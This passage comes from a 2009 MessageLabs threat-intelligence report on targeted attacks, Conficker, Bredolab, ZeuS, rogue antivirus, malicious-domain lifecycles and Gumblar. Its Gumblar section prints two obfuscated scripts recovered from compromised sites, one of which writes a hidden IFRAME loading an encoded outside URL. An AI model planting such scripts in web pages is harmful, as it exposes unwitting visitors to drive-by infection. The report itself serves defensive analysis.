Jul 08

Jul 09
May 08

May 09
Feb 09

Mar 09
Apr 08

Oct 08

Apr 09

Oct 09
Aug 08

Sep 08

Dec 08

Nov 09
Aug 09

Sep 09

Figure 28: Monthly trend of individual targeted attacks (average/day)

The recipients of these attacks included individuals from some of the central banks involved

31

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

with the G20. The email included a .PDF attachment, which if opened would cause a Trojan
downloader to be installed and executed. This would then download further spyware
components onto the target computer.
These targeted attacks began using G20-related topics for social engineering in late Febru-
ary and early March, targeting financial institutions and central banks more intensively
during this period, until early April. The peak of activity began around mid-March, just
before the pre-G20 meeting of key financial stakeholders. It was noted that some attacks
were crafted as replies to actual non-malicious emails, indicating that at least one of the
recipients had already been infected.
Analysis of the types of exploit being employed during 2009 reveal an increase in the use of
.PDF documents as compared with other file types, as can be seen in the chart below.
PDF PPT

XLS
Doc TXT

Other
EXE

Jan 09
Sep 08

Sep 09
Dec 08
Jul 08

Jul 09
Jun 08

Feb 09

Jun 09
Aug 08

Aug 09
Oct 08

Oct 09
Nov 08
Apr 08

Apr 09
May 08

May 09
Mar 09
Figure 29: Types of applications and exploits used in targeted attacks
A typical example of a targeted attack shows how relevant the content can be to the
individual or organization being targeted.

Figure 30: Examples of targeted attack using application exploits in attached documents
In some more sophisticated examples, the target may be approached through an intermedi-
ary who has already been compromised, typically through a small to medium sized business
that may have a supplier relationship with the intended target. Receipt of such an email
from someone with whom the target has already established a rapport makes it much more
difficult to recognize as an attack because of this provenance.
Globally, in the last six months of 2009, Messagelabs Intelligence identified that for clients
that were targeted by these types of attacks, an average of 38 targeted Trojans were blocked
per client, and on average, all clients may expect one targeted attack every two years.

% of GLOBAL % customers 1 in N customers

Industry/sector targeted trojans targeted targeted
Gov/Public Sector 34.7% 34.7% 5.1
Mineral/Fuel 2.0% 2.0% 5.7
Telecoms 2.1% 2.1% 7.4

32

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Education 7.1% 7.1% 10.9

Non-Profit 3.2% 3.2% 11.9
Manufacturing 7.0% 7.0% 12.3
Engineering 0.6% 0.6% 12.4
Transport/Util 2.3% 2.3% 12.9
Admin 0.3% 0.3% 13.8
Chem/Pharm 1.5% 1.5% 13.9
Recreation 0.6% 0.6% 15.2
Marketing/Media 7.0% 7.0% 15.3
Automotive 0.0% 0.0% 17.3
General Services 1.7% 1.7% 17.4
Prof Services 7.7% 7.7% 18.9
Finance 10.6% 10.6% 23.7
Health Care 0.2% 0.2% 24.0
IT Services 5.5% 5.5% 24.7
Accom/Catering 0.1% 0.1% 24.8
Building/Cons 0.3% 0.3% 25.5
Wholesale 0.3% 0.3% 29.4
Other 0.5% 0.5% 32.8
Estate Agents 0.1% 0.1% 33.4
Agriculture 0.2% 0.2% 35.0
Retail 0.2% 0.2% 37.9
Unknown 4.3% 4.3% 58.4
Figure 31: Industries targeted
4.3.1. Status of Individuals Targeted
MessageLabs Intelligence analyzed a random selection of targeted Trojan attacks from the
second half of 2009 and ranked them according to the seniority of the recipients of each
attack, as follows:
• High - directors, vice presidents, high level managers, senior executives;
• Medium - most professionals, mid-level managers, etc;
• Low - secretarial, general administrative staff, etc.
If an attack was sent to a general mailbox like “enquiries@” or “info@” it was categorized
separately.
The analysis revealed that 60% of recipients were of a high or medium-level ranking:
• 42% of recipients of targeted attacks were sent to high ranking individuals;
• 18% of recipients were of a medium-level seniority;
• 5% were of a lower-ranking seniority;
• 19% of targeted attacks were directed at general mailboxes such as “enquiries@” or
“info@.”
Further investigation revealed that it was remarkably easy to discover the details of 84% of
the recipients of the attacks analyzed, using publically available tools and search engines.
It seems clear that attackers tend to go for higher ranking, more senior employees as they,
or rather their computers, may have access to the most valuable data. However, the analysis
also reveals that attackers also target lower-ranking staff, such as secretaries, and personal
assistants, perhaps in the hope that they would be less suspicious of an attack and may be
more inclined to forward the email to another contact internally.

4.3.2. Social Networking and Semi-Targeted Attacks

33

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Many social networking websites opened-up their APIs to allow for third-party developers in
2009, resulting in a rise in third-party applications appearing on social networking websites.
Many of which are likely to become more targeted by attackers looking for vulnerabilities in
the APIs and also in the websites upon which these applications are being hosted.
Often social networking applications are hosted on legitimate domains outside of the social
network infrastructure itself, and these are expected to come under attack with the injection
of malicious scripts and hidden malicious IFRAME HTML tags.
In 2009, some of the major social networking websites had begun to be targeted with rogue
third-party applications that were designed for harvesting user profile information and to
generate online advertizing revenue.
In 2009, criminals turned to public services such as popular micro-blogging sites to identify
people blogging about their first day in a new job, for example. This would be the prelude to
a social engineering attack via another social network, such as those used mainly by profes-
sionals, where the attacker will masquerade as another employee of the same organization,
perhaps someone from the HR or IT department.
Over a period of time they will build a rapport with the victim in order to understand the
company’s internal security measures and use the information gathered in this way as the
prelude to conducting spear-phishing attacks (e.g. “there’s a problem with your account –
can you click here to reset your password,” or “can you just confirm the URL that was given
to you for the VPN connection?”).

4.4. The Rise of Generic Droppers: Downadup/Conficker

Since its discovery by Symantec in November 2008, the malicious Downadup worm, also
known as Conficker, is believed to have infected more than 6 million computers worldwide.
In an effort to stifle its widespread proliferation and to mitigate the risks from potentially
such a large botnet, collaboration among Symantec and a number of global technology
industry leaders and academics was formed.
This alliance became known as the Conficker Working Group7. In February 2009, Microsoft
offered a reward of U.S.$ 250,000 to anyone able to identify the authors of the Downadup
malware, a reward which remained uncollected at the end of 2009.
Potentially one of the most concerning security threats of 2009, Downadup allows its
creators to remotely install software on infected machines. It is of particular concern as the
way in which it will use infected machines has not yet clearly been identified.
April Fools’ Day, which falls on the first day of April, is one time of the year when people are
expected to play tricks on one another, but this date was also important for another reason
when it became linked with the Downadup malware. The reason for this was that security
analysts had identified that computers already infected with earlier strains of this malware
could be timed to update themselves to a newer, more advanced version (Downadup.C) on 1
April.
This update provided additional functionality to the malware in order for it to better evade
detection and possible disruption, and introduced some new anti-detection countermea-
sures allowing it to kill processes relating to some anti-virus products.
On 8 April, a new strain was identified (Downadup.E), which also appeared to be dropping
copies of the Waledac malware as well. We may yet find out what Downadup has in store in
2010, but the activities of the Conficker Working Group may have contributed to minimizing
the role this malware potentially played in 2009. However, another generic Trojan dropper,
Bredolab, has perhaps been more active in 2009.

7 For more information on Downadup (Conficker), please visit http://www.confickerworkinggroup.org

34

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

4.5. Bredolab Trojans Delivered by Cutwail Botnet

MessageLabs Intelligence tracked a dramatic rise in volume of the Bredolab 8 Trojan being
sent by the Cutwail (Pandex) botnet. Bredolab is a Trojan that may arrive in the form of a
.ZIP file attachment to an email. The most notable examples appearing in the latter part of
2009 contained subjects referring to postal tracking numbers.

Figure 32: Example of Bredolab email

These Trojans were designed to give the sender complete control of the target computer.
The emails prompted the recipients to open and run the attachment which would automati-
cally install the Trojan. Many different parcel services were referenced9 in these messages,
including UPS, Fedex and DHL. In some variations, the email purported that the potential
victim was in receipt of a money transfer, and that the details were contained in the attach-
ment. Later examples10 included fake messages suggesting that the recipient’s password
had been changed on a popular social networking site.
The percentage of spam relating to the Bredolab Trojan increased steadily in late 2009,
reaching its highest levels in October and November. Each day in October these spam mes-
sages accounted for approximately 3.5% of spam and 5.6% of email-borne malware. Global
projections indicated that approximately 3.6 billion Bredolab malware emails were likely to
be in circulation each day at that time.
35%

30%

25%

20%

15%

10%

5%

0%
Oct 26

Oct 26

Oct 26

Oct 26

Oct 26

Oct 26

Oct 26

Oct 26

Oct 26

Oct 27

Oct 27

Oct 27

Oct 27

Oct 27

Oct 27

Oct 27

Oct 27

Oct 27
15:00

16:00

17:00

18:00

19:00

20:00

21:00

22:00

23:00

00:00

01:00

02:00

03:00

04:00

05:00

06:00

07:00

08:00

Figure 33: Bredolab emails spoofing a popular social networking site

8 For further information on Bredolab, please visit http://www.symantec.com/connect/blogs/taking-closer-

look-trojanbredolab
9 http://www.symantec.com/connect/blogs/bredolab-delivers-more-parcels-and-cash
10 http://www.symantec.com/connect/blogs/bredolab-trojan-now-using-popular-social-networking-brand-
spread

35

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Bredolab contributed to 1.7% of all email-borne malware intercepted in 2009, or 3.4% of

all malware intercepted since June. As seen in figure 34, Bredolab malware interceptions
peaked on 16 November when Bredolab accounted for 30.7% of email-borne malware in a
single day.
35%
30%
25%
20%
15%
10%
5%
0%

30 Sep
28 Feb

30 Jun
31 Jan
31 Dec

31 Aug
31 Jul

31 Oct
30 Apr

30 Nov
31 May
31 Mar
Figure 34: Bredolab Trojan interceptions in email-borne malware
Most of the Bredolab malware interceptions from web browser traffic were from legitimate,
but compromised websites, and from users attempting to download the malware by access-
ing web-based email accounts from their corporate network.
0.4%

0.3%

0.2%

0.1%

0.0%

20 Sep
20 Jul

20 Aug
20 Jun
20 Feb

20 Oct
20 Apr

20 May
20 Mar

Figure 35: Bredolab malware blocked in web traffic

Once installed, Bredolab attempted to disable the host based security in order to facilitate
the downloading of other malicious content. By nature, once this Trojan is on a system, it is
unlikely to be detected and could allow the controller to do whatever they wished with the
infected machine, such as installing other malware and spyware.
Cyber criminals were preying on the curiosity people feel when receiving an unexpected
parcel and were potentially delivering high levels of malware accordingly. In the run-up
to the holiday season, this tactic proved increasingly successful, suggesting that cyber
criminals were returning to a back-to-basics approach and were deliberately using .ZIP
file attachments as a way of evading detection from some email security vendors that only
blocked typical suspicious attachments, such as executables. Often .ZIP files were not on
this list of potentially suspicious files.
With the most common form of malicious file in 2009 being .ZIP files, this was not always
going to be straightforward; .ZIP files are a common file format and have often been used for
sending malware in the past, but are often used legitimately too. There is no indication that
a .ZIP file attachment represents an increased likelihood of a file being malicious; however,
most businesses are unlikely to use .ZIP files as part of their typical email correspondence.
A machine infected with Bredolab can find that it has disabled all access to many Windows
tools, including:
• Task manager: When the user hits Ctrl+Alt+Del;
• Registry: The user is unable to see the locations in the registry where the file hides itself,
in order to be executed every time the system is restarted;
• File extensions are obscured, as Bredolab changes the default folder settings and disables
the access to the folder option from the Windows explorer pane.

36

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Figure 36: Changes made by Bredolab infection

Finally, Bredolab and its associated malware, which has hooked into the user’s web browser,
could hijack Internet search engine results pages (SERPs), injecting alternative hyperlinks
into the results pages that redirect users to alternative websites containing sponsored
hyperlinks. By clicking on these links the browser is eventually redirected to the correct web
pages, generating click-through revenue for the bad guys.

Figure 37: Bredolab and its associated malware hijacking SERP hyperlinks

4.6. The Rise of Malicious Websites, New Malware & Toolkits

4.6.1. Arresting the Spread of the ZeuS Trojan Toolkit
There was a flash of light at the end of the tunnel in November after officers from the U.K.’s
Metropolitan Police’s Central e-Crime Unit (PCeU) announced the first European arrests in
the battle against one particular piece of malware, ZeuS (aka Zbot). ZeuS is a sophisticated
Trojan toolkit that is believed to have infected and subsequently accessed personal informa-
tion from tens of thousands of computers around the world.
The malware enabled the distributors to harvest enormous amounts of personal data from
infected computers, with significantly large financial gains in store for the bad guys and
substantial losses for affected individuals and businesses.
The ZeuS Trojan is able to harvest users’ online bank account details and passwords, credit
card numbers and other personal information, including passwords for social networking
sites, passing this data back to servers under the control of the cyber criminals.
4.6.2. Rogue Security Software Update
New ways to conduct Internet fraud were uncovered in 2009 and one of the growing trends
to emerge during the course of the year was the use of misleading software programs,
especially “rogue” or bogus security software.
Rogue security software is a type of misleading application often known as “scareware,”
which purports to be legitimate, such as an anti-virus product. In reality, it provides the user
with little or no protection, and, in some cases, may facilitate the installation of malware
that claims to safeguard against it. Their purpose is to trick users into believing that the
rogue security application is valid and to convince them to pay for it.

37

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

A variety of methods are used by the bad guys to lure users to fraudulent websites, relying
heavily on social engineering tactics. Once installed, the rogue security software will typi-
cally display a number of hoax security threats, but will encourage the user into visiting an
associated website in order to purchase the full software license.
In October 2009, Symantec published11 an in-depth analysis of rogue security software pro-
grams and how they could affect users. The report included an overview of these programs,
how they work, their risk implications, various distribution methods and innovative attack
vectors.

Figure 38: Examples of rogue security software

4.6.3. Malicious websites on the rise

For 2009, the average number of new malicious websites blocked each day rose to 2,465
compared to 2,290 for 2008, an increase of 7.6%. MessageLabs Intelligence identified
malicious web threats on 30,000 distinct domains. 80% of those domains were established
legitimate, compromised websites, the remaining 20% were new domains set up purely with
malicious intent.
Web-based malware became easier than ever to create in 2009, largely owing to the avail-
ability of web-attack toolkits that enable even novices to create fairly sophisticated mal-
ware, driving a trend towards increasingly more disposable malware, with threats appearing
and disappearing within a 24-hour timeframe.
For the bad guys, it can be a costly exercise to produce new families of malware in order to
maintain their criminal activity at sufficient levels. Registering new domains is much more
economical for them, and by spreading the malware across as many different websites and
domains as possible, the longevity of each new malware is increased.
When employing server-side polymorphism, the same family of malware code may be pack-
aged differently into new strains, automatically and dynamically, each time it is accessed.
This requires a different anti-virus signature each time in order to detect it accurately. These
approaches combined with the use of “bullet-proof” hosting services and “fast-flux” hosting
means that criminals can ensure that malicious websites are not taken down quickly in
response to complaints.
The emergence of server-side polymorphism has proven very effective and difficult to
safeguard against using traditional anti-virus signatures. The polymorphic engines, or the
algorithms used to change the code, do not reside within the malware itself, but remotely
- perhaps on the web server that is used to deliver the malware and cannot be analyzed
readily for creating signatures.
In many cases the organized criminals have highly automated techniques available to them
that require little or no monitoring, as their systems continue to operate automatically day
and night compromising as many new legitimate websites as possible and registering new
ones. Once these processes are in place, a compromised website can often be re-configured
or updated remotely depending on what method the attackers are using.
MessageLabs Intelligence analysis shows that the average number of new malicious web-
sites blocked each day rose to 2,465, and on average 40.5% of these were domains being
blocked for the first time. Similarly, analysis of the malware being blocked each day reveals
11 http://www.symantec.com/business/theme.jsp?themeid=threatreport

38

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

that around 15.9% was from new families of malware being blocked for the first time each
day, as seen in figure 39.
90%

80%

70%

60%

50%

40%

30%

20%

10%

0%
Mar Apr May Jun Jul Aug Sep Oct

Figure 39: New web malware vs. new blocked domains

In 2009, the nature of the threat shifted towards older, more well-established domains
being used to host much of the web-borne malware. Legitimate sites were more likely to
be trusted and were more valuable to the criminals if compromised through SQL injection
attacks, for example. Similarly, spammers abused the services of well-known online webmail
and social networking environments to host more spam content in order to evade detection.
When analyzing the MessageLabs Hosted Web Security Services (WSS) database, approxi-
mately 99.95% of Web Security Service (WSS) blocks were the result of policy-based rules
enforced by clients; the remaining 0.05% were blocks of malicious websites. The proportion
of WSS blocks that were malicious had been steadily increasing by the end of 2009, from
0.03% in September 2009, to 0.05% in November 2009.
Each day in 2009, 39% of WSS customers had a URL blocked because of a policy enforced
and for those customers, the average number of policy-based websites blocked was 6,265.
The average number of policy-based blocks per customer per day, remained steady at about
2,500 throughout the year.
In 2009, 10% of WSS customers had at least one malicious URL blocked each day. And for
those customers there were an average of 12.9 blocks each. The proportion of WSS custom-
ers with malicious URLs blocked increased towards the end of 2009:
• Sept 2009: 9% of customers affected with 10.1 blocks each;
• Oct 2009: 8% of customers affected with 14.2 blocks each
Across the entire WSS customer base, the average number of malicious blocks made per
customer per day was 1.26. This also increased from 0.87 in September 2009 and 1.20 in
October 2009.
The likelihood of a user visiting malicious URLs increased during 2009 and by October,
the average number of malicious URLs blocked per client per day passed one for the first
time. This means that many businesses are increasingly likely to have at least one person
attempting to visit malicious content hosted on a website.

4.6.4. From Stepping Stones to Drive-By Attacks

In 2008, Symantec12 tracked over 18 million drive-by download infection attempts; between
August and October 2009 alone, this number already reached 17.4 million.
When a victim downloads malware directly from a compromised, legitimate website, the
victim may be automatically led through a complex system of invisible redirects to the
endpoint where the new malware is hosted. In addition, often many new websites are
brought online over time to act as “stepping-stones” between the compromised websites
and the endpoints where the malware is located.

12 http://www.symantec.com/connect/blogs/breadth-security-issues-2009-stunning

39

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Website hosting
Users
new malware

Proxy sites used

to redirect
Website hosting
Users
new malware
User clicks on link
which redirects to
malware

Website hosting
Users
new malware

Over time more proxy-sites are

added to replace old ones

Figure 40: Lifecycle of malicious websites over time

When a new strain of malware is created, it is initially hosted on a small number of websites
and hyperlinks added from other malicious websites and emails. Over time, more malicious
websites are used, and often combined with simple redirects using JavaScript or HTTP 302
server errors to divert the visitor seamlessly to another website, or to the malware itself.
Often several redirections may be used, as one website bounces the user to another before
the malware is reached. This process would be invisible to the user, perhaps only noticeable
as the page may take longer to load. The use of these “disposable” proxies helps to ensure
that the websites hosing the malware remain obscured for as long as possible.
For example, of 100 domains blocked each day in 2009:
• 36 of them had not been blocked previously; with
• 30 (84.5%) from older, compromised legitimate domains;
• 6 (15.5%) from newer, recently registered domains;
• 64 were domains (legitimate or otherwise), that had been blocked previously and were
already known for harboring malware.
4.6.5. Malware More Likely to be Found on Compromised Websites
The traditional school of thought suggested that most web-based malware resides on less
reputable websites often touting adult-themed content, but this premise was called into
question when MessageLabs Intelligence identified that cybercriminals were more likely
to hide malicious content on older, more reputable domains; domains that were legitimate
and well-established, but had been compromised. Some of these domains were also
associated with social networking environments and Web 2.0 websites, providing mainly
user-generated content.
MessageLabs Intelligence data in 2009 revealed that:
• 84.6% of website domains blocked for hosting malicious content are well-established
domains that are over a year old;
• 15.4% of domains blocked are domains that are less than a year old;
• 10.2% are domains that are less than a month old;
• and 3.1% are domains that are less than a week old.
These older domains were more likely to be well-established and therefore more reputable,
and the likelihood that they were legitimate sites that had been compromised in some way
was increased. Malicious domains that were only a week old or less were more likely to be
temporary sites set up with the sole purpose of distributing malware or spam, and were
typical of many domains established solely to distribute rogue anti-spyware or anti-malware
products.
Very new sites are also often used by website affiliates, in order to redirect visitors to
another site. This helps to ensure that they receive payment for any click-through revenue

40

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

that their sites generate, but sometimes they will also include drive-by attacks, often using
hidden HTML IFRAME exploits.
Once a domain like this has been used to serve malware to unsuspecting visitors, it is
usually not too long before the domain is recognized by the security community and may
appear in a block-list. Once blocked, steps are then taken to issue a notice and takedown
to the registrar or hosting provider to remove it as a threat from the Internet. However, in
the case of compromised legitimate websites, the legitimate owners should be notified that
their websites have been compromised and be given the opportunity to take appropriate
action to clean up their websites, removing the malware and closing any vulnerability that
was exploited to gain access.
4.6.6. The Importance of Age: Are Older Domains More Difficult to Clean?
How long, on average, does it take for a malicious website to be noticed, removed or
rendered harmless again? The vast majority (over 90%) of domains blocked by the Mes-
sageLabs Hosted Web Security Service (WSS), were taken down or cleaned up within 120
days, or four months. One-third of malicious websites were taken down or cleaned within
seven days and 13% of websites were taken down or cleaned within one day, as seen in
figure 41.
The typical profile of websites that were compromised and being used to serve malware
indicated that they had been registered for more than three months before first being
blocked as hosting malicious content. These may be termed “older” domains. The research
indicated that these domains, when used to host malicious content, actually survived for
a longer period of time than their younger counterparts and would take a relatively long
time to be cleaned. Only 8% of legitimate or older websites were cleaned within one day;
11% within two days; and 21% within one week. Furthermore, 90% of older domains were
cleaned up within 138 days, a very long time when compared with the clean-up rate for
“young” domains.

ALL DOMAINS YOUNG DOMAINS OLDER DOMAINS

13% of all blocked domains are taken 29% of all blocked domains are taken 8% of all blocked domains are taken
down; or cleaned within 1 day of down; or cleaned within 1 day of down; or cleaned within 1 day of
being first blocked as malicious being first blocked as malicious being first blocked as malicious

18% within 2 days 40% within 2 days 11% within 2 days

32% within 7 days 65% within 7 days 21% within 7 days
50% within 25 days 87% within 30 days 43% within 30 days
54% within 30 days 90% are cleaned with 38 days 90% are cleaned with 134 days
90% are cleaned with 120 days
24% take more than 2 weeks to be 70% take more than 2 weeks to be
58% take more than 2 weeks to be cleaned cleaned
cleaned 35% more than 7 days 79% more than 7 days
68% more than 7 days 71% take more than 1 day 92% take more than 1 day
87% take more than 1 day

Figure 41: Clean-up rates for website domains linked to malware

Websites established with the intent to serve malware were often reached through redirec-
tion scripts and links from other legitimate websites, such as links posted on social network-
ing websites, malicious or compromised banner advertising, hyperlinks posted in spam
emails and hyperlinks shared over instant messaging traffic.
The typical profile of these websites indicated that they had been registered up to three
months before first being blocked for hosting malicious content. These may be called
“young” domains. There are only a small number of newly registered legitimate websites
that fall into this category and have become compromised, but the vast majority are young
websites blocked as malicious and founded with malicious intent.
The wider Internet community and Internet security companies are often much more aware
of these newly-registered domains harboring malicious content and a relatively large pro-
portion of them (approximately 29%) are taken down after just one day; 40% are removed
within two days; and 65% within one week. Generally, 90% of “young” malicious domains
are taken down within 38 days.

41

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

100%
Over time more than 80% of
malicious domains
are “Old” domains
80%

“Old” domains
60%
80%
40%
“New” Domains

20%

0%
0 30 60 90 120 150 180
Days

Figure 42: Chart showing clean-up lifecycle for website domains linked to malware
Perhaps it is not surprising that with such a small window of opportunity, the bad guys
continue to register many new domains as often as possible. Once activated and serving
malware, it was then only a matter of time before each domain would be taken offline or
cleaned.
4.6.7. The End of “Domain Tasting” and “Domain Kiting” in 2009
It often seemed to take much longer for compromised legitimate websites to be cleaned as
taking down a malicious (“young”) domain would be relatively easy. Finding the malicious
parts of a sometimes large and complex, legitimate and often “older” website, and then
repairing it without causing damage to the operation of the website, is much harder.
Once the compromise has been identified, steps are needed to secure the site against
further attack. Most companies, especially large ones, may have to go through several
stages internally to achieve this. In some cases, the threat may be so deeply knotted within
the structure of the website that it may take website administrators a much longer time to
identify a mitigation strategy and implement it.
With approximately 80% of domains blocked as malicious being legitimate websites, it
is clear to see why attackers preferred to compromise legitimate websites, rather than to
create and register newer, specialized domains to serve the malware. Fundamentally, using
legitimate websites to spread malware potentially extends the lifetime of the malware. In
other words, it seems to take much longer to make these types of websites safe again.
There is also another factor to consider: For a long time, spammers, scammers and malware
distributors have been able to take advantage of a time limit policy called “Add Grace
Period” which allows them to register and then delete a domain at no cost, as long as the
cancellation was within the first five days. This practice is known as “domain tasting.”
Repeated use of “domain tasting” is called “domain kiting,” where domains potentially
remain registered for considerably longer periods without ever being paid for.
In order to combat “domain tasting” and “domain kiting,” in June 2008, ICANN (Internet
Corporation for Assigned Names and Numbers) implemented a couple of measures to
address the problem and would only allow domain registrars to de-register up to 10% of
their total registrations and be fully credited with their costs, but an excessively higher
number of cancellations would result in a penalty being imposed. This meant that U.S. $0.20
would be levied for each domain cancellation over and above the 10% limit, increasing
this penalty to U.S. $6.75 as of July 2009. And in August 2009, ICANN reported a 99.7%
decrease in such deletions between June 2008 and April 2009. Perhaps this finding reflects
the trend described above and goes some way to explaining why malicious domains in 2009
were likely to be older, compromised websites rather than newly registered domains with a
shorter lifespan, as they had been one year previously.
4.6.8. The Rise of Drive-By Malware
The Internet has provided a rich breeding ground for the spread of malware through
drive-by attacks on compromised websites and through fake profiles and phished accounts
on social networking websites. MessageLabs Intelligence analyzed the domains that were
being used to host the majority of malicious content blocked in 2009 and determined how

42

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

much of a factor the age of a domain is in potentially determining the nature of malicious
websites. Malicious domains are domains that were established with the pure intention to
serve malware, or sometimes, legitimate websites that have been compromised in some way
for use as a platform from which the cybercriminals serve their malware. A typical example
of this was found in the spread of the Gumblar malware.

3
Hacker inserts
1 malicious url Users is re-directed
to Bad Web site
Web Bad
site site

Web User visits

Good Web site

2 4
6
Badsite sends ob-
Malware sends private fuscated exploit for
data to Hacker vulnerability on end
user’s system

Malware installed without

5 User notciing

Figure 43: Typical profile of a drive-by website attack

When the Gumblar malware was discovered in March 2009, it received instructions from
a server at gumblar.cn. That domain was taken offline, but in November it had seemingly
returned. In figure 44, it can be seen that the malware made an unwelcome return in
October and November 2009.
In October 2009, Gumblar malware accounted for less than 1% of all malicious web activity
blocked, but in November 2009 this figure rose to more than 20% of all malicious web
activity blocked.
In November 2009, 641 different domains were blocked owing to Gumblar infections, but
only 15% of those were registered during 2009. This strongly suggests that the attackers
had been seeking mostly to infect legitimate websites in order for it to spread.
60%

50%

40%

30%
gumblar.cn
20%

10%

0%
4-Sep

18-Sep
10-Jul

24-Jul

21-Aug
12-Jun
20-Feb

26-Jun

16-Oct

30-Oct
7-Aug

2-Oct

13-Nov
3-Apr

17-Apr

15-May

29-May
1-May
6-Mar

20-Mar

Figure 44: % of WSS traffic blocked linked to Gumblar in 2009

On one example website, the item blocked as Gumblar was in a file named sponsor.php,
which contained the following obfuscated script:
// 404 <script>
pXads=24;if(prompt)pXads='';W4oYE=unescape('%'+pXads);
bFr='';
eval(unescape(bFr.replace(/[sPARm]/g,W4oYE)));
//</script>

In another example, htaccess.php, the following highly obfuscated script could be found:

43

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

<!-- mxiT sdfsd fFDSGHHFLJ QpoeMFcBE Jsdf2 34sdKJSGHD --><script>/*_ETDUgjXHHsPRwB*/var

UoaYW=document;/*ZhrKKeLMtGo*/function ixekV_(IPqcMJ)/*GGrIVvncvNlccEcKblPy*/{var ROVBw =
"",/*cDvbb XrTU YAxVWlCtKRA*/FchmZybuaK=0;for(FchmZybuaK=IPqcMJ.length-1;FchmZybuaK >=
0;FchmZybuaK--)/*GGrIVvncvNlccEcKblPy*/{ROVBw+=IPqcMJ.charAt(FchmZybuaK);}return ROVBw;/*TmU
ExYK OCEcYaUs hnzPxfOA*/}/*SMXIq vqPtz tkhbKj VmKPR*/function
LgDLGtpg(vfpejwlolC)/*VkhfuYaKSyC*/{/*SMXIqvqPtztkhbKjVmKPR*/vfpejwlolC =
vfpejwlolC.replace(/[\.]/g, "%");/*TmUEx YKOCEc
aUshnzPxfOA*/vfpejwlolC=unescape(vfpejwlolC);/*pR_jrUloIVVsbiJzei*/return
ixekV_(vfpejwlolC);/*ZhrKKeLMtGo*/}/*KAXQTqUZeuhOrfGM_B*/function MnE_vpOF(){/*BSDNf yxyq
FdEnFRrXt_q*/UoaYW.write("<style>.ziKoRZhTA{width:1px;height:1px;border:none;visibility:hidden
}</style>");/*OEcWuzvdnSifFzrbTzBGVLsl*//*kIKhEhiXzphvzl*/var
dmiaXgrp="";/*kIKhEhiXzphvzl*//*OOBbwTKCJmtmNLwMzIVSpZ*/var
PqSiNZf=dmiaXgrp.replace(/[\+x]/g,LgDLGtpg(".70.68.70.2e.6e.69.2f.73.72.65.73.75.2f.6f.66.6e.6
9.2e.73.63.69.74.79.6c.61.6e.61.2d.73.74.61.74.73.2f.2f.3a.70.74.74.68"));/*BPRQiOgwzAY_fBHF*/
/*VkhfuYaKSyC*/return
PqSiNZf;/*cDvbbXrTUYAxVWlCtKRA*//*mNtGiUcPmHJEcBDVhzkp*/}/*lqNbuXUvhsx*//*NipwgVkhKkGaiMpIelzQ
zfqg*//*JzrbYbIRwneHlb*//*cDvbbXrTUYAxVWlCtKRA*/UoaYW.writeln(MnE_vpOF());/*Nipwg VkhKk
GaiMpIelzQzfqg*//*mN tGiUc PmHJEcBDVhzkp*//*OOBbw TKCJmtm NLwMz IVSpZ*/</script><!--
mxiTQpoeMFcBEJ-->

A Gumblar-infected website typically contains a hidden IFRAME tag, which is an often used
tactic to serve-up malicious scripts from other websites. Upon visiting such a site, the
hidden IFRAME will then include malicious scripts that will seek to exploit certain vulner-
abilities on the users’ computers, for example, targeting un-patched versions of a popular
.PDF viewer can result in a drive-by attack.
4.6.9. Black Hat SEO: Increasing Traffic to Compromised Websites
Once hackers take control of compromised websites, they can fool innocent visitors in many
different ways. The black hat (BH) search engine optimization (SEO) techniques are becom-
ing increasingly popular to indirectly target more victims through polluting search engine
result pages (SERPs). This is particularly useful from the bad guys’ perspective as they track
the popular search terms relating to news and current events, they will seek to reference
these popular terms in the BHSEO techniques in order to increase the search engine rank-
ings for their malicious content.
Compromised websites are frequently configured in order to present different content to the
search engines which crawl the websites from that which is presented to real visitors, who
visit the site by following links in SERPs.
Once the website has identified that a visitor is not a search engine crawler, but a real visi-
tor, it would simply redirect them to another website that would be hosting the malware.
Often the owners of a compromised website may be unaware that the BHSEO process relies
on unscrupulous techniques such as link-farming, “doorway” pages and cloaking. These ap-
proaches are very much frowned upon by the search engine providers and once discovered
the website will be penalized in terms of the rankings on those search engines – this may
even result in all references to the legitimate content on the compromised website being
revoked – potentially disastrous for any legitimate business.
4.6.10. Beyond Black Hat SEO: Black Hat Affiliate Marketing
Bad guys can benefit from the hijacked traffic from search engine searches in many
different ways. Apart from the example above to install fake antivirus software or some
other Trojan horse download, another good example of benefiting from Black Hat Search
Engine Optimization (BHSEO) is the Black Hat Affiliate Marketing (BHAM). Similar to BHSEO,
Black Hat Affiliate Marketing does questionable things to make money by injecting affiliate
information into a user’s computer. Typically the normal affiliate marketing works in the
following procedure
1. A visitor views an affiliate webpage or link;
2. The visitor clicks on an affiliate link;
3. The visitor makes a purchase from the affiliate associated merchant within a specific
period since last click.
Using BHAM, affiliates seek to bypass the first two steps by simulating clicks on affiliate
links to automatically place affiliate cookies to the user’s computer. This is called “cookie
stuffing”. As long as the user makes a purchase from any of the affiliate associated
merchants during the valid period of a cookie, the affiliate will get commission from the
merchant. A cookie normally has a given valid period, for example, 30 days. To reward the
affiliate, a customer must make a purchase from the corresponding merchant during that
period when the cookie is still valid.

44

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

To apply cookie stuffing techniques, affiliates often create tiny or zero-size HTML IFRAME
tags containing the affiliate links and then inserting them into compromised web pages
or ad banners. In figure 45, three invisible IFRAMEs are appended to a normal ad banner.
In this case, when the ad banner is loaded, it will load the invisible IFRAMEs and place the
affiliate cookies into the users’ computer without them realizing. This technique is used to
bypass steps 1 and 2 above, in order to simulate a real user clicking on affiliate links.

Figure 45: Zero-size hidden IFRAMES containing affiliate links

